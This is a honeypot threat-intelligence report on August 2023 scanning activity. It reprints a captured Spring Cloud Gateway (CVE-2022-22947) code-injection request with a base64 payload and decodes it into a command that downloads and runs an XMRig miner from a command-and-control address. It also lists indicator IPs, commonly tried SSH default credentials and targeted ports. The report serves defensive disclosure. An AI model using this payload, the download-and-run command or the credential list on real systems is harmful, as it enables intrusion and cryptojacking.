CERTHoneypots

Our selection of alerts on honeypots: report 17 – September 2023

TEHTRIS believes in creating cyber threat intelligence based on empiric observations of what is happening in the cyberworld. To do so, we deployed a large network of honeypots – equipped with TEHTRIS solutions, and our team analyses logs collected in the XDR Platform.

Keeping track of trends and keeping an eye on what is actively scanned by threat actors in a reconnaissance phase allows to adjust the cybersecurity posture and detect low signals for further malicious activities.

Check out our previous report here.

CVE-2022-22947 EXPLOIT ATTEMPTS

We have observed CVE-2022-22947 (CVSSv3: 10) exploit attempts on our honeypots network. This CVE affects Spring Cloud Gateway applications, which are vulnerable to code injection when the Gateway Actuator endpoint is enabled, exposed and unsecured.

On the 26th and the 27th of August, the US IP address 185.207.250[.]115, hosted by AS51167 (Contabo GmbH) and known from public databases for being malicious, targeted our honeypots on port TCP/80. The devices affected are European honeypots hosted in the following countries: Spain, France, Estonia, Netherlands, Czech Republic, Finland, Portugal, Belgium, Ireland, Italy, and Poland.

Here is an example of the corresponding URL captured by our honeypot:

POST /actuator/gateway/routes/AzMtdFlkrml HTTP/1.1
User-Agent: Custom-HttpClient { "id": "AzMtdFlkrml", "filters": [{ "name": "AddResponseHeader", "args": { "name": "Result", "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String(java.util.Base64.getDecoder().decode(\"cGtpbGwgLTkgLmZveG07IGNkIC90bXA7IHdnZXQgaHR0cDovLzE4NS4yMjUuNzUuMjQyL2Rvd25sb2FkL3htcmlnLng4Nl82NDsgY3VybCAtTyBodHRwOi8vMTg1LjIyNS43NS4yNDIvZG93bmxvYWQveG1yaWcueDg2XzY0OyBtdiB4bXJpZy54ODZfNjQgLmZveG07IGNobW9kICt4IC5mb3htOyAuLy5mb3ht\"))).getInputStream()))}" } }], "uri": "http://example.com" }

This request exploits CVE-2022-22947 and execute a base64 encoded command on the victim.
The decoded command downloads an Xmrig cryptocurrency miner and executes it :

pkill -9 .foxm; cd /tmp; wget http[:]//185.225.75[.]242/download/xmrig.x86_64; curl -O http[:]//185.225.75[.]242/download/xmrig.x86_64; mv xmrig.x86_64 .foxm; chmod +x .foxm; ./.foxm

This C2 (command & control) Dutch IP address 185.225.75[.]242 is hosted by AS211252 Delis LLC and known from VirusTotal community as it is referred for SSH credential attacks and linked to a miner.

IoCs

  • 185.207.250[.]115
  • 185.225.75[.]242

For the month of August 2023, we have observed the following trends regarding malicious activities targeting SSH services on our worldwide honeypots network.

Top 10 credentials tested by threat actors:

LoginPassword
345gs5662d34345gs5662d34
adminadmin
00
ubntubnt
rootpassword
rootroot
adminadmin123
factoryfactory
3comcsoRIP000
camerascameras

Top 10 of the most malicious IP addresses (all known from public databases):

  • 193.105.134[.]95
  • 185.246.128[.]133
  • 218.92.0[.]119
  • 218.92.0[.]120
  • 218.92.0[.]123
  • 185.224.128[.]141
  • 185.224.128[.]142
  • 180.101.88[.]234
  • 180.101.88[.]249
  • 180.101.88[.]223

Top ports/protocols targeted by threat actors – August 2023

ProtocolPort%
TCP44518.833%
TCP2212.43%
TCP806.273%
TCP235.598%
TCP63791.546%
TCP4431.22%
UDP125221.166%
TCP33890.964%
UDP50600.641%
TCP84430.508%

Top 10 most exploited CVE – August 2023

CVE-2023-34362 EXPLOIT ATTEMPTS